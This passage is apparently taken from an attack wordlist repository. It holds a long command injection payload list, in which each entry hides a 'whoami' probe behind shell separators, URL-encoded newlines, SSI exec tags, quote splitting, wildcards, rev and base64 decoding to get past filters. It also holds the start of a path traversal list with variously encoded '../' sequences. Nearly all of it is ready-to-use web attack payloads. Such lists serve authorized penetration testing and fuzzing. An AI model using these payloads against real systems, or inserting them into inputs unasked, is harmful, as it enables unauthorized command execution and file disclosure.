163 | FAIL||CMD=$\'wh"o"ami\';$CMD
164 | CMD=$"wh"o"ami";$CMD
165 | ;CMD=$"wh"o"ami";$CMD
166 | ^CMD=$"wh"o"ami";$CMD
167 | |CMD=$"wh"o"ami";$CMD
168 | &CMD=$"wh"o"ami";$CMD
169 | &&CMD=$"wh"o"ami";$CMD
170 | %0DCMD=$"wh"o"ami";$CMD
171 | FAIL||CMD=$"wh"o"ami";$CMD
172 | <!--#exec cmd="wh"o"ami"-->
173 | ;system('wh"o"ami')
174 | $(wh"o"ami)
175 | wh'oa'mi
176 | ;wh'oa'mi
177 | ;wh'oa'mi;
178 | ^wh'oa'mi
179 | |wh'oa'mi
180 | <wh'oa'mi
181 | <wh'oa'mi;
182 | <wh'oa'mi\n
183 | <wh'oa'mi%0D
184 | <wh'oa'mi%0A
185 | &wh'oa'mi
186 | &wh'oa'mi&
187 | &&wh'oa'mi
188 | &&wh'oa'mi&&
189 | %0Dwh'oa'mi
190 | %0Dwh'oa'mi%0D
191 | %0Awh'oa'mi
192 | %0Awh'oa'mi%0A
193 | \nwh'oa'mi
194 | \nwh'oa'mi\n
195 | 'wh'oa'mi'
196 | `wh'oa'mi`
197 | ;wh'oa'mi|
198 | ;wh'oa'mi/n
199 | |wh'oa'mi;
200 | a);wh'oa'mi
201 | a;wh'oa'mi
202 | a);wh'oa'mi
203 | a;wh'oa'mi;
204 | a);wh'oa'mi|
205 | FAIL||wh'oa'mi
206 | CMD=$'wh'oa'mi';$CMD
207 | ;CMD=$'wh'oa'mi';$CMD
208 | ^CMD=$'wh'oa'mi';$CMD
209 | |CMD=$'wh'oa'mi';$CMD
210 | &CMD=$'wh'oa'mi';$CMD
211 | &&CMD=$'wh'oa'mi';$CMD
212 | %0DCMD=$'wh'oa'mi';$CMD
213 | FAIL||CMD=$'wh'oa'mi';$CMD
214 | CMD=$\'wh'oa'mi\';$CMD
215 | ;CMD=$\'wh'oa'mi\';$CMD
216 | ^CMD=$\'wh'oa'mi\';$CMD
217 | |CMD=$\'wh'oa'mi\';$CMD
218 | &CMD=$\'wh'oa'mi\';$CMD
219 | &&CMD=$\'wh'oa'mi\';$CMD
220 | %0DCMD=$\'wh'oa'mi\';$CMD
221 | FAIL||CMD=$\'wh'oa'mi\';$CMD
222 | CMD=$"wh'oa'mi";$CMD
223 | ;CMD=$"wh'oa'mi";$CMD
224 | ^CMD=$"wh'oa'mi";$CMD
225 | |CMD=$"wh'oa'mi";$CMD
226 | &CMD=$"wh'oa'mi";$CMD
227 | &&CMD=$"wh'oa'mi";$CMD
228 | %0DCMD=$"wh'oa'mi";$CMD
229 | FAIL||CMD=$"wh'oa'mi";$CMD
230 | <!--#exec cmd="wh'oa'mi"-->
231 | ;system('wh'oa'mi')
232 | $(wh'oa'mi)
233 | who??i
234 | ;who??i
235 | ;who??i;
236 | ^who??i
237 | |who??i
238 | <who??i
239 | <who??i;
240 | <who??i\n
241 | <who??i%0D
242 | <who??i%0A
243 | &who??i
244 | &who??i&
245 | &&who??i
246 | &&who??i&&
247 | %0Dwho??i
248 | %0Dwho??i%0D
249 | %0Awho??i
250 | %0Awho??i%0A
251 | \nwho??i
252 | \nwho??i\n
253 | 'who??i'
254 | `who??i`
255 | ;who??i|
256 | ;who??i/n
257 | |who??i;
258 | a);who??i
259 | a;who??i
260 | a);who??i
261 | a;who??i;
262 | a);who??i|
263 | FAIL||who??i
264 | CMD=$'who??i';$CMD
265 | ;CMD=$'who??i';$CMD
266 | ^CMD=$'who??i';$CMD
267 | |CMD=$'who??i';$CMD
268 | &CMD=$'who??i';$CMD
269 | &&CMD=$'who??i';$CMD
270 | %0DCMD=$'who??i';$CMD
271 | FAIL||CMD=$'who??i';$CMD
272 | CMD=$\'who??i\';$CMD
273 | ;CMD=$\'who??i\';$CMD
274 | ^CMD=$\'who??i\';$CMD
275 | |CMD=$\'who??i\';$CMD
276 | &CMD=$\'who??i\';$CMD
277 | &&CMD=$\'who??i\';$CMD
278 | %0DCMD=$\'who??i\';$CMD
279 | FAIL||CMD=$\'who??i\';$CMD
280 | CMD=$"who??i";$CMD
281 | ;CMD=$"who??i";$CMD
282 | ^CMD=$"who??i";$CMD
283 | |CMD=$"who??i";$CMD
284 | &CMD=$"who??i";$CMD
285 | &&CMD=$"who??i";$CMD
286 | %0DCMD=$"who??i";$CMD
287 | FAIL||CMD=$"who??i";$CMD
288 | <!--#exec cmd="who??i"-->
289 | ;system('who??i')
290 | $(who??i)
291 | wh*ami
292 | ;wh*ami
293 | ;wh*ami;
294 | ^wh*ami
295 | |wh*ami
296 | <wh*ami
297 | <wh*ami;
298 | <wh*ami\n
299 | <wh*ami%0D
300 | <wh*ami%0A
301 | &wh*ami
302 | &wh*ami&
303 | &&wh*ami
304 | &&wh*ami&&
305 | %0Dwh*ami
306 | %0Dwh*ami%0D
307 | %0Awh*ami
308 | %0Awh*ami%0A
309 | \nwh*ami
310 | \nwh*ami\n
311 | 'wh*ami'
312 | `wh*ami`
313 | ;wh*ami|
314 | ;wh*ami/n
315 | |wh*ami;
316 | a);wh*ami
317 | a;wh*ami
318 | a);wh*ami
319 | a;wh*ami;
320 | a);wh*ami|
321 | FAIL||wh*ami
322 | CMD=$'wh*ami';$CMD
323 | ;CMD=$'wh*ami';$CMD
324 | ^CMD=$'wh*ami';$CMD
325 | |CMD=$'wh*ami';$CMD
326 | &CMD=$'wh*ami';$CMD
327 | &&CMD=$'wh*ami';$CMD
328 | %0DCMD=$'wh*ami';$CMD
329 | FAIL||CMD=$'wh*ami';$CMD
330 | CMD=$\'wh*ami\';$CMD
331 | ;CMD=$\'wh*ami\';$CMD
332 | ^CMD=$\'wh*ami\';$CMD
333 | |CMD=$\'wh*ami\';$CMD
334 | &CMD=$\'wh*ami\';$CMD
335 | &&CMD=$\'wh*ami\';$CMD
336 | %0DCMD=$\'wh*ami\';$CMD
337 | FAIL||CMD=$\'wh*ami\';$CMD
338 | CMD=$"wh*ami";$CMD
339 | ;CMD=$"wh*ami";$CMD
340 | ^CMD=$"wh*ami";$CMD
341 | |CMD=$"wh*ami";$CMD
342 | &CMD=$"wh*ami";$CMD
343 | &&CMD=$"wh*ami";$CMD
344 | %0DCMD=$"wh*ami";$CMD
345 | FAIL||CMD=$"wh*ami";$CMD
346 | <!--#exec cmd="wh*ami"-->
347 | ;system('wh*ami')
348 | $(wh*ami)
349 | wh``ami
350 | ;wh``ami
351 | ;wh``ami;
352 | ^wh``ami
353 | |wh``ami
354 | <wh``ami
355 | <wh``ami;
356 | <wh``ami\n
357 | <wh``ami%0D
358 | <wh``ami%0A
359 | &wh``ami
360 | &wh``ami&
361 | &&wh``ami
362 | &&wh``ami&&
363 | %0Dwh``ami
364 | %0Dwh``ami%0D
365 | %0Awh``ami
366 | %0Awh``ami%0A
367 | \nwh``ami
368 | \nwh``ami\n
369 | 'wh``ami'
370 | `wh``ami`
371 | ;wh``ami|
372 | ;wh``ami/n
373 | |wh``ami;
374 | a);wh``ami
375 | a;wh``ami
376 | a);wh``ami
377 | a;wh``ami;
378 | a);wh``ami|
379 | FAIL||wh``ami
380 | CMD=$'wh``ami';$CMD
381 | ;CMD=$'wh``ami';$CMD
382 | ^CMD=$'wh``ami';$CMD
383 | |CMD=$'wh``ami';$CMD
384 | &CMD=$'wh``ami';$CMD
385 | &&CMD=$'wh``ami';$CMD
386 | %0DCMD=$'wh``ami';$CMD
387 | FAIL||CMD=$'wh``ami';$CMD
388 | CMD=$\'wh``ami\';$CMD
389 | ;CMD=$\'wh``ami\';$CMD
390 | ^CMD=$\'wh``ami\';$CMD
391 | |CMD=$\'wh``ami\';$CMD
392 | &CMD=$\'wh``ami\';$CMD
393 | &&CMD=$\'wh``ami\';$CMD
394 | %0DCMD=$\'wh``ami\';$CMD
395 | FAIL||CMD=$\'wh``ami\';$CMD
396 | CMD=$"wh``ami";$CMD
397 | ;CMD=$"wh``ami";$CMD
398 | ^CMD=$"wh``ami";$CMD
399 | |CMD=$"wh``ami";$CMD
400 | &CMD=$"wh``ami";$CMD
401 | &&CMD=$"wh``ami";$CMD
402 | %0DCMD=$"wh``ami";$CMD
403 | FAIL||CMD=$"wh``ami";$CMD
404 | <!--#exec cmd="wh``ami"-->
405 | ;system('wh``ami')
406 | $(wh``ami)
407 | who``ami
408 | ;who``ami
409 | ;who``ami;
410 | ^who``ami
411 | |who``ami
412 | <who``ami
413 | <who``ami;
414 | <who``ami\n
415 | <who``ami%0D
416 | <who``ami%0A
417 | &who``ami
418 | &who``ami&
419 | &&who``ami
420 | &&who``ami&&
421 | %0Dwho``ami
422 | %0Dwho``ami%0D
423 | %0Awho``ami
424 | %0Awho``ami%0A
425 | \nwho``ami
426 | \nwho``ami\n
427 | 'who``ami'
428 | `who``ami`
429 | ;who``ami|
430 | ;who``ami/n
431 | |who``ami;
432 | a);who``ami
433 | a;who``ami
434 | a);who``ami
435 | a;who``ami;
436 | a);who``ami|
437 | FAIL||who``ami
438 | CMD=$'who``ami';$CMD
439 | ;CMD=$'who``ami';$CMD
440 | ^CMD=$'who``ami';$CMD
441 | |CMD=$'who``ami';$CMD
442 | &CMD=$'who``ami';$CMD
443 | &&CMD=$'who``ami';$CMD
444 | %0DCMD=$'who``ami';$CMD
445 | FAIL||CMD=$'who``ami';$CMD
446 | CMD=$\'who``ami\';$CMD
447 | ;CMD=$\'who``ami\';$CMD
448 | ^CMD=$\'who``ami\';$CMD
449 | |CMD=$\'who``ami\';$CMD
450 | &CMD=$\'who``ami\';$CMD
451 | &&CMD=$\'who``ami\';$CMD
452 | %0DCMD=$\'who``ami\';$CMD
453 | FAIL||CMD=$\'who``ami\';$CMD
454 | CMD=$"who``ami";$CMD
455 | ;CMD=$"who``ami";$CMD
456 | ^CMD=$"who``ami";$CMD
457 | |CMD=$"who``ami";$CMD
458 | &CMD=$"who``ami";$CMD
459 | &&CMD=$"who``ami";$CMD
460 | %0DCMD=$"who``ami";$CMD
461 | FAIL||CMD=$"who``ami";$CMD
462 | <!--#exec cmd="who``ami"-->
463 | ;system('who``ami')
464 | $(who``ami)
465 | who$()ami
466 | ;who$()ami
467 | ;who$()ami;
468 | ^who$()ami
469 | |who$()ami
470 | <who$()ami
471 | <who$()ami;
472 | <who$()ami\n
473 | <who$()ami%0D
474 | <who$()ami%0A
475 | &who$()ami
476 | &who$()ami&
477 | &&who$()ami
478 | &&who$()ami&&
479 | %0Dwho$()ami
480 | %0Dwho$()ami%0D
481 | %0Awho$()ami
482 | %0Awho$()ami%0A
483 | \nwho$()ami
484 | \nwho$()ami\n
485 | 'who$()ami'
486 | `who$()ami`
487 | ;who$()ami|
488 | ;who$()ami/n
489 | |who$()ami;
490 | a);who$()ami
491 | a;who$()ami
492 | a);who$()ami
493 | a;who$()ami;
494 | a);who$()ami|
495 | FAIL||who$()ami
496 | CMD=$'who$()ami';$CMD
497 | ;CMD=$'who$()ami';$CMD
498 | ^CMD=$'who$()ami';$CMD
499 | |CMD=$'who$()ami';$CMD
500 | &CMD=$'who$()ami';$CMD
501 | &&CMD=$'who$()ami';$CMD
502 | %0DCMD=$'who$()ami';$CMD
503 | FAIL||CMD=$'who$()ami';$CMD
504 | CMD=$\'who$()ami\';$CMD
505 | ;CMD=$\'who$()ami\';$CMD
506 | ^CMD=$\'who$()ami\';$CMD
507 | |CMD=$\'who$()ami\';$CMD
508 | &CMD=$\'who$()ami\';$CMD
509 | &&CMD=$\'who$()ami\';$CMD
510 | %0DCMD=$\'who$()ami\';$CMD
511 | FAIL||CMD=$\'who$()ami\';$CMD
512 | CMD=$"who$()ami";$CMD
513 | ;CMD=$"who$()ami";$CMD
514 | ^CMD=$"who$()ami";$CMD
515 | |CMD=$"who$()ami";$CMD
516 | &CMD=$"who$()ami";$CMD
517 | &&CMD=$"who$()ami";$CMD
518 | %0DCMD=$"who$()ami";$CMD
519 | FAIL||CMD=$"who$()ami";$CMD
520 | <!--#exec cmd="who$()ami"-->
521 | ;system('who$()ami')
522 | $(who$()ami)
523 | who{neko}ami
524 | ;who{neko}ami
525 | ;who{neko}ami;
526 | ^who{neko}ami
527 | |who{neko}ami
528 | <who{neko}ami
529 | <who{neko}ami;
530 | <who{neko}ami\n
531 | <who{neko}ami%0D
532 | <who{neko}ami%0A
533 | &who{neko}ami
534 | &who{neko}ami&
535 | &&who{neko}ami
536 | &&who{neko}ami&&
537 | %0Dwho{neko}ami
538 | %0Dwho{neko}ami%0D
539 | %0Awho{neko}ami
540 | %0Awho{neko}ami%0A
541 | \nwho{neko}ami
542 | \nwho{neko}ami\n
543 | 'who{neko}ami'
544 | `who{neko}ami`
545 | ;who{neko}ami|
546 | ;who{neko}ami/n
547 | |who{neko}ami;
548 | a);who{neko}ami
549 | a;who{neko}ami
550 | a);who{neko}ami
551 | a;who{neko}ami;
552 | a);who{neko}ami|
553 | FAIL||who{neko}ami
554 | CMD=$'who{neko}ami';$CMD
555 | ;CMD=$'who{neko}ami';$CMD
556 | ^CMD=$'who{neko}ami';$CMD
557 | |CMD=$'who{neko}ami';$CMD
558 | &CMD=$'who{neko}ami';$CMD
559 | &&CMD=$'who{neko}ami';$CMD
560 | %0DCMD=$'who{neko}ami';$CMD
561 | FAIL||CMD=$'who{neko}ami';$CMD
562 | CMD=$\'who{neko}ami\';$CMD
563 | ;CMD=$\'who{neko}ami\';$CMD
564 | ^CMD=$\'who{neko}ami\';$CMD
565 | |CMD=$\'who{neko}ami\';$CMD
566 | &CMD=$\'who{neko}ami\';$CMD
567 | &&CMD=$\'who{neko}ami\';$CMD
568 | %0DCMD=$\'who{neko}ami\';$CMD
569 | FAIL||CMD=$\'who{neko}ami\';$CMD
570 | CMD=$"who{neko}ami";$CMD
571 | ;CMD=$"who{neko}ami";$CMD
572 | ^CMD=$"who{neko}ami";$CMD
573 | |CMD=$"who{neko}ami";$CMD
574 | &CMD=$"who{neko}ami";$CMD
575 | &&CMD=$"who{neko}ami";$CMD
576 | %0DCMD=$"who{neko}ami";$CMD
577 | FAIL||CMD=$"who{neko}ami";$CMD
578 | <!--#exec cmd="who{neko}ami"-->
579 | ;system('who{neko}ami')
580 | $(who{neko}ami)
581 | `echo "imaohw" | rev`
582 | ;`echo "imaohw" | rev`
583 | ;`echo "imaohw" | rev`;
584 | ^`echo "imaohw" | rev`
585 | |`echo "imaohw" | rev`
586 | <`echo "imaohw" | rev`
587 | <`echo "imaohw" | rev`;
588 | <`echo "imaohw" | rev`\n
589 | <`echo "imaohw" | rev`%0D
590 | <`echo "imaohw" | rev`%0A
591 | &`echo "imaohw" | rev`
592 | &`echo "imaohw" | rev`&
593 | &&`echo "imaohw" | rev`
594 | &&`echo "imaohw" | rev`&&
595 | %0D`echo "imaohw" | rev`
596 | %0D`echo "imaohw" | rev`%0D
597 | %0A`echo "imaohw" | rev`
598 | %0A`echo "imaohw" | rev`%0A
599 | \n`echo "imaohw" | rev`
600 | \n`echo "imaohw" | rev`\n
601 | '`echo "imaohw" | rev`'
602 | ``echo "imaohw" | rev``
603 | ;`echo "imaohw" | rev`|
604 | ;`echo "imaohw" | rev`/n
605 | |`echo "imaohw" | rev`;
606 | a);`echo "imaohw" | rev`
607 | a;`echo "imaohw" | rev`
608 | a);`echo "imaohw" | rev`
609 | a;`echo "imaohw" | rev`;
610 | a);`echo "imaohw" | rev`|
611 | FAIL||`echo "imaohw" | rev`
612 | CMD=$'`echo "imaohw" | rev`';$CMD
613 | ;CMD=$'`echo "imaohw" | rev`';$CMD
614 | ^CMD=$'`echo "imaohw" | rev`';$CMD
615 | |CMD=$'`echo "imaohw" | rev`';$CMD
616 | &CMD=$'`echo "imaohw" | rev`';$CMD
617 | &&CMD=$'`echo "imaohw" | rev`';$CMD
618 | %0DCMD=$'`echo "imaohw" | rev`';$CMD
619 | FAIL||CMD=$'`echo "imaohw" | rev`';$CMD
620 | CMD=$\'`echo "imaohw" | rev`\';$CMD
621 | ;CMD=$\'`echo "imaohw" | rev`\';$CMD
622 | ^CMD=$\'`echo "imaohw" | rev`\';$CMD
623 | |CMD=$\'`echo "imaohw" | rev`\';$CMD
624 | &CMD=$\'`echo "imaohw" | rev`\';$CMD
625 | &&CMD=$\'`echo "imaohw" | rev`\';$CMD
626 | %0DCMD=$\'`echo "imaohw" | rev`\';$CMD
627 | FAIL||CMD=$\'`echo "imaohw" | rev`\';$CMD
628 | CMD=$"`echo "imaohw" | rev`";$CMD
629 | ;CMD=$"`echo "imaohw" | rev`";$CMD
630 | ^CMD=$"`echo "imaohw" | rev`";$CMD
631 | |CMD=$"`echo "imaohw" | rev`";$CMD
632 | &CMD=$"`echo "imaohw" | rev`";$CMD
633 | &&CMD=$"`echo "imaohw" | rev`";$CMD
634 | %0DCMD=$"`echo "imaohw" | rev`";$CMD
635 | FAIL||CMD=$"`echo "imaohw" | rev`";$CMD
636 | <!--#exec cmd="`echo "imaohw" | rev`"-->
637 | ;system('`echo "imaohw" | rev`')
638 | $(`echo "imaohw" | rev`)
639 | $(echo d2hvYW1pCg== | base64 -d)
640 | ;$(echo d2hvYW1pCg== | base64 -d)
641 | ;$(echo d2hvYW1pCg== | base64 -d);
642 | ^$(echo d2hvYW1pCg== | base64 -d)
643 | |$(echo d2hvYW1pCg== | base64 -d)
644 | <$(echo d2hvYW1pCg== | base64 -d)
645 | <$(echo d2hvYW1pCg== | base64 -d);
646 | <$(echo d2hvYW1pCg== | base64 -d)\n
647 | <$(echo d2hvYW1pCg== | base64 -d)%0D
648 | <$(echo d2hvYW1pCg== | base64 -d)%0A
649 | &$(echo d2hvYW1pCg== | base64 -d)
650 | &$(echo d2hvYW1pCg== | base64 -d)&
651 | &&$(echo d2hvYW1pCg== | base64 -d)
652 | &&$(echo d2hvYW1pCg== | base64 -d)&&
653 | %0D$(echo d2hvYW1pCg== | base64 -d)
654 | %0D$(echo d2hvYW1pCg== | base64 -d)%0D
655 | %0A$(echo d2hvYW1pCg== | base64 -d)
656 | %0A$(echo d2hvYW1pCg== | base64 -d)%0A
657 | \n$(echo d2hvYW1pCg== | base64 -d)
658 | \n$(echo d2hvYW1pCg== | base64 -d)\n
659 | '$(echo d2hvYW1pCg== | base64 -d)'
660 | `$(echo d2hvYW1pCg== | base64 -d)`
661 | ;$(echo d2hvYW1pCg== | base64 -d)|
662 | ;$(echo d2hvYW1pCg== | base64 -d)/n
663 | |$(echo d2hvYW1pCg== | base64 -d);
664 | a);$(echo d2hvYW1pCg== | base64 -d)
665 | a;$(echo d2hvYW1pCg== | base64 -d)
666 | a);$(echo d2hvYW1pCg== | base64 -d)
667 | a;$(echo d2hvYW1pCg== | base64 -d);
668 | a);$(echo d2hvYW1pCg== | base64 -d)|
669 | FAIL||$(echo d2hvYW1pCg== | base64 -d)
670 | CMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
671 | ;CMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
672 | ^CMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
673 | |CMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
674 | &CMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
675 | &&CMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
676 | %0DCMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
677 | FAIL||CMD=$'$(echo d2hvYW1pCg== | base64 -d)';$CMD
678 | CMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
679 | ;CMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
680 | ^CMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
681 | |CMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
682 | &CMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
683 | &&CMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
684 | %0DCMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
685 | FAIL||CMD=$\'$(echo d2hvYW1pCg== | base64 -d)\';$CMD
686 | CMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
687 | ;CMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
688 | ^CMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
689 | |CMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
690 | &CMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
691 | &&CMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
692 | %0DCMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
693 | FAIL||CMD=$"$(echo d2hvYW1pCg== | base64 -d)";$CMD
694 | <!--#exec cmd="$(echo d2hvYW1pCg== | base64 -d)"-->
695 | ;system('$(echo d2hvYW1pCg== | base64 -d)')
696 | $($(echo d2hvYW1pCg== | base64 -d))
697 | w\ho\\mi
698 | ;w\ho\\mi
699 | ;w\ho\\mi;
700 | ^w\ho\\mi
701 | |w\ho\\mi
702 | <w\ho\\mi
703 | <w\ho\\mi;
704 | <w\ho\\mi\n
705 | <w\ho\\mi%0D
706 | <w\ho\\mi%0A
707 | &w\ho\\mi
708 | &w\ho\\mi&
709 | &&w\ho\\mi
710 | &&w\ho\\mi&&
711 | %0Dw\ho\\mi
712 | %0Dw\ho\\mi%0D
713 | %0Aw\ho\\mi
714 | %0Aw\ho\\mi%0A
715 | \nw\ho\\mi
716 | \nw\ho\\mi\n
717 | 'w\ho\\mi'
718 | `w\ho\\mi`
719 | ;w\ho\\mi|
720 | ;w\ho\\mi/n
721 | |w\ho\\mi;
722 | a);w\ho\\mi
723 | a;w\ho\\mi
724 | a);w\ho\\mi
725 | a;w\ho\\mi;
726 | a);w\ho\\mi|
727 | FAIL||w\ho\\mi
728 | CMD=$'w\ho\\mi';$CMD
729 | ;CMD=$'w\ho\\mi';$CMD
730 | ^CMD=$'w\ho\\mi';$CMD
731 | |CMD=$'w\ho\\mi';$CMD
732 | &CMD=$'w\ho\\mi';$CMD
733 | &&CMD=$'w\ho\\mi';$CMD
734 | %0DCMD=$'w\ho\\mi';$CMD
735 | FAIL||CMD=$'w\ho\\mi';$CMD
736 | CMD=$\'w\ho\\mi\';$CMD
737 | ;CMD=$\'w\ho\\mi\';$CMD
738 | ^CMD=$\'w\ho\\mi\';$CMD
739 | |CMD=$\'w\ho\\mi\';$CMD
740 | &CMD=$\'w\ho\\mi\';$CMD
741 | &&CMD=$\'w\ho\\mi\';$CMD
742 | %0DCMD=$\'w\ho\\mi\';$CMD
743 | FAIL||CMD=$\'w\ho\\mi\';$CMD
744 | CMD=$"w\ho\\mi";$CMD
745 | ;CMD=$"w\ho\\mi";$CMD
746 | ^CMD=$"w\ho\\mi";$CMD
747 | |CMD=$"w\ho\\mi";$CMD
748 | &CMD=$"w\ho\\mi";$CMD
749 | &&CMD=$"w\ho\\mi";$CMD
750 | %0DCMD=$"w\ho\\mi";$CMD
751 | FAIL||CMD=$"w\ho\\mi";$CMD
752 | <!--#exec cmd="w\ho\\mi"-->
753 | ;system('w\ho\\mi')
754 | $(w\ho\\mi)
755 | wh$@ami
756 | ;wh$@ami
757 | ;wh$@ami;
758 | ^wh$@ami
759 | |wh$@ami
760 | <wh$@ami
761 | <wh$@ami;
762 | <wh$@ami\n
763 | <wh$@ami%0D
764 | <wh$@ami%0A
765 | &wh$@ami
766 | &wh$@ami&
767 | &&wh$@ami
768 | &&wh$@ami&&
769 | %0Dwh$@ami
770 | %0Dwh$@ami%0D
771 | %0Awh$@ami
772 | %0Awh$@ami%0A
773 | \nwh$@ami
774 | \nwh$@ami\n
775 | 'wh$@ami'
776 | `wh$@ami`
777 | ;wh$@ami|
778 | ;wh$@ami/n
779 | |wh$@ami;
780 | a);wh$@ami
781 | a;wh$@ami
782 | a);wh$@ami
783 | a;wh$@ami;
784 | a);wh$@ami|
785 | FAIL||wh$@ami
786 | CMD=$'wh$@ami';$CMD
787 | ;CMD=$'wh$@ami';$CMD
788 | ^CMD=$'wh$@ami';$CMD
789 | |CMD=$'wh$@ami';$CMD
790 | &CMD=$'wh$@ami';$CMD
791 | &&CMD=$'wh$@ami';$CMD
792 | %0DCMD=$'wh$@ami';$CMD
793 | FAIL||CMD=$'wh$@ami';$CMD
794 | CMD=$\'wh$@ami\';$CMD
795 | ;CMD=$\'wh$@ami\';$CMD
796 | ^CMD=$\'wh$@ami\';$CMD
797 | |CMD=$\'wh$@ami\';$CMD
798 | &CMD=$\'wh$@ami\';$CMD
799 | &&CMD=$\'wh$@ami\';$CMD
800 | %0DCMD=$\'wh$@ami\';$CMD
801 | FAIL||CMD=$\'wh$@ami\';$CMD
802 | CMD=$"wh$@ami";$CMD
803 | ;CMD=$"wh$@ami";$CMD
804 | ^CMD=$"wh$@ami";$CMD
805 | |CMD=$"wh$@ami";$CMD
806 | &CMD=$"wh$@ami";$CMD
807 | &&CMD=$"wh$@ami";$CMD
808 | %0DCMD=$"wh$@ami";$CMD
809 | FAIL||CMD=$"wh$@ami";$CMD
810 | <!--#exec cmd="wh$@ami"-->
811 | ;system('wh$@ami')
812 | $(wh$@ami)
813 | echo whoami|$0
814 | ;echo whoami|$0
815 | ;echo whoami|$0;
816 | ^echo whoami|$0
817 | |echo whoami|$0
818 | <echo whoami|$0
819 | <echo whoami|$0;
820 | <echo whoami|$0\n
821 | <echo whoami|$0%0D
822 | <echo whoami|$0%0A
823 | &echo whoami|$0
824 | &echo whoami|$0&
825 | &&echo whoami|$0
826 | &&echo whoami|$0&&
827 | %0Decho whoami|$0
828 | %0Decho whoami|$0%0D
829 | %0Aecho whoami|$0
830 | %0Aecho whoami|$0%0A
831 | \necho whoami|$0
832 | \necho whoami|$0\n
833 | 'echo whoami|$0'
834 | `echo whoami|$0`
835 | ;echo whoami|$0|
836 | ;echo whoami|$0/n
837 | |echo whoami|$0;
838 | a);echo whoami|$0
839 | a;echo whoami|$0
840 | a);echo whoami|$0
841 | a;echo whoami|$0;
842 | a);echo whoami|$0|
843 | FAIL||echo whoami|$0
844 | CMD=$'echo whoami|$0';$CMD
845 | ;CMD=$'echo whoami|$0';$CMD
846 | ^CMD=$'echo whoami|$0';$CMD
847 | |CMD=$'echo whoami|$0';$CMD
848 | &CMD=$'echo whoami|$0';$CMD
849 | &&CMD=$'echo whoami|$0';$CMD
850 | %0DCMD=$'echo whoami|$0';$CMD
851 | FAIL||CMD=$'echo whoami|$0';$CMD
852 | CMD=$\'echo whoami|$0\';$CMD
853 | ;CMD=$\'echo whoami|$0\';$CMD
854 | ^CMD=$\'echo whoami|$0\';$CMD
855 | |CMD=$\'echo whoami|$0\';$CMD
856 | &CMD=$\'echo whoami|$0\';$CMD
857 | &&CMD=$\'echo whoami|$0\';$CMD
858 | %0DCMD=$\'echo whoami|$0\';$CMD
859 | FAIL||CMD=$\'echo whoami|$0\';$CMD
860 | CMD=$"echo whoami|$0";$CMD
861 | ;CMD=$"echo whoami|$0";$CMD
862 | ^CMD=$"echo whoami|$0";$CMD
863 | |CMD=$"echo whoami|$0";$CMD
864 | &CMD=$"echo whoami|$0";$CMD
865 | &&CMD=$"echo whoami|$0";$CMD
866 | %0DCMD=$"echo whoami|$0";$CMD
867 | FAIL||CMD=$"echo whoami|$0";$CMD
868 | <!--#exec cmd="echo whoami|$0"-->
869 | ;system('echo whoami|$0')
870 | $(echo whoami|$0)
871 | whoami
872 | 


--------------------------------------------------------------------------------
/Attacks/LFI/Traversal.txt:
--------------------------------------------------------------------------------
  1 | ../
  2 | ../../
  3 | ../../../
  4 | ../../../../
  5 | ../../../../../
  6 | ../../../../../../
  7 | ../../../../../../../
  8 | ../../../../../../../../
  9 | ../../../../../../../../../
 10 | ../../../../../../../../../../
 11 | ../../../../../../../../../../../
 12 | ../../../../../../../../../../../../
 13 | ../../../../../../../../../../../../../
 14 | ../../../../../../../../../../../../../../
 15 | ../../../../../../../../../../../../../../../
 16 | ..%2f
 17 | ..%2f..%2f
 18 | ..%2f..%2f..%2f
 19 | ..%2f..%2f..%2f..%2f
 20 | ..%2f..%2f..%2f..%2f..%2f
 21 | ..%2f..%2f..%2f..%2f..%2f..%2f
 22 | ..%2f..%2f..%2f..%2f..%2f..%2f..%2f
 23 | ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
 24 | %2e%2e/
 25 | %2e%2e/%2e%2e/
 26 | %2e%2e/%2e%2e/%2e%2e/
 27 | %2e%2e/%2e%2e/%2e%2e/%2e%2e/
 28 | %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
 29 | %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
 30 | %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
 31 | %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
 32 | %2e%2e%2f
 33 | %2e%2e%2f%2e%2e%2f
 34 | %2e%2e%2f%2e%2e%2f%2e%2e%2f
 35 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
 36 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
 37 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
 38 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
 39 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
 40 | ..%252f
 41 | ..%252f..%252f
 42 | ..%252f..%252f..%252f
 43 | ..%252f..%252f..%252f..%252f
 44 | ..%252f..%252f..%252f..%252f..%252f
